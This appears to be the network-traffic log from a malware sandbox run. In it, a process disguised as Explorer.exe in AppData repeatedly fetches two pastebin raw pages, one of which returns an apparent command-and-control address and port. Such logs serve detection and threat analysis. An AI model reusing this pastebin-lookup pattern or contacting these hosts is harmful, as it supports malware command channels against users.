Dec 9, 2024 14:15:07.647357941 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:07 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:07 GMT
    Location: https://pastebin.com/raw/KKpnJShN
    Server: cloudflare
    CF-RAY: 8ef5431bcbab4405-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50041 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:15:12.782363892 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
Dec 9, 2024 14:15:13.880243063 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:13 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:13 GMT
    Location: https://pastebin.com/raw/hbwHfEg3
    Server: cloudflare
    CF-RAY: 8ef54342ace3c45c-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50043 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:15:14.006746054 CET | 74 | OUT | GET /raw/KKpnJShN HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
Dec 9, 2024 14:15:15.101675034 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:14 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:14 GMT
    Location: https://pastebin.com/raw/KKpnJShN
    Server: cloudflare
    CF-RAY: 8ef5434a5ef8422e-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50045 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:15:20.238331079 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
Dec 9, 2024 14:15:21.386061907 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:21 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:21 GMT
    Location: https://pastebin.com/raw/hbwHfEg3
    Server: cloudflare
    CF-RAY: 8ef543719e9e7292-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50047 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:15:21.509484053 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
    Host: pastebin.com
Dec 9, 2024 14:15:22.617626905 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:22 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:22 GMT
    Location: https://pastebin.com/raw/KKpnJShN
    Server: cloudflare
    CF-RAY: 8ef5437949048ce8-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50049 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:15:28.766935110 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
Dec 9, 2024 14:15:29.864563942 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:29 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:29 GMT
    Location: https://pastebin.com/raw/hbwHfEg3
    Server: cloudflare
    CF-RAY: 8ef543a69a9d5e6d-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50051 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:15:29.986428022 CET | 74 | OUT | GET /raw/KKpnJShN HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
Dec 9, 2024 14:15:31.081731081 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:30 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:30 GMT
    Location: https://pastebin.com/raw/KKpnJShN
    Server: cloudflare
    CF-RAY: 8ef543ae3ab74252-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50053 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:15:36.528752089 CET | 50 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
    Host: pastebin.com
Dec 9, 2024 14:15:37.636913061 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:37 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:37 GMT
    Location: https://pastebin.com/raw/hbwHfEg3
    Server: cloudflare
    CF-RAY: 8ef543d72945558a-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Dec 9, 2024 14:15:37.637427092 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
    Host: pastebin.com
Dec 9, 2024 14:15:38.119513035 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:37 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:37 GMT
    Location: https://pastebin.com/raw/KKpnJShN
    Server: cloudflare
    CF-RAY: 8ef543da0bbd558a-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             38 | 192.168.2.5 | 50054 | 172.67.19.24 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             Dec 9, 2024 14:15:43.261617899 CET | 50 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                             Dec 9, 2024 14:15:44.360963106 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:44 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef544012ce86a5c-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                             Dec 9, 2024 14:15:44.362515926 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                             Dec 9, 2024 14:15:44.684132099 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:44 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef544033f6a6a5c-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             39 | 192.168.2.5 | 50056 | 172.67.19.24 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             Dec 9, 2024 14:15:49.812793016 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                             Dec 9, 2024 14:15:50.940239906 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:50 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5442a5b8bde96-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                             Dec 9, 2024 14:15:50.940969944 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                             Dec 9, 2024 14:15:51.260962009 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:51 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:51 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5442c58f4de96-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             40 | 192.168.2.5 | 50057 | 172.67.19.24 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             Dec 9, 2024 14:15:56.391242981 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                             Dec 9, 2024 14:15:57.489962101 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:57 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef544534c1742c3-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                             Dec 9, 2024 14:15:57.495171070 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                             Dec 9, 2024 14:15:57.819231987 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:57 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef544555ef042c3-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             0 | 192.168.2.5 | 49705 | 172.67.19.24 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-12-09 13:12:11 UTC | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                             2024-12-09 13:12:12 UTC | 391 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:12:12 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: EXPIRED
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:12 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53ed33b2b43b5-EWR
                                                             2024-12-09 13:12:12 UTC | 20 | IN | Data Raw: 66 0d 0a 31 39 34 2e 36 37 2e 32 30 34 2e 37 3a 38 38 0d 0a
                                                             Data Ascii: f194.67.204.7:88
                                                             2024-12-09 13:12:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                             Data Ascii: 0


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             1 | 192.168.2.5 | 49769 | 172.67.19.24 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-12-09 13:12:43 UTC | 74 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                             2024-12-09 13:12:43 UTC | 391 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: EXPIRED
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53f978908423a-EWR
                                                             2024-12-09 13:12:43 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                             Data Ascii: 30:0
                                                             2024-12-09 13:12:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                             Data Ascii: 0


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             2 | 192.168.2.5 | 49795 | 172.67.19.24 | 443 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-12-09 13:12:52 UTC | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                             2024-12-09 13:12:53 UTC | 395 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:12:52 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 9
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53fd249944402-EWR
                                                             2024-12-09 13:12:53 UTC | 8 | IN | Data Raw: 33 0d 0a 30 3a 30 0d 0a
                                                             Data Ascii: 30:0
                                                             2024-12-09 13:12:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                             Data Ascii: 0


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
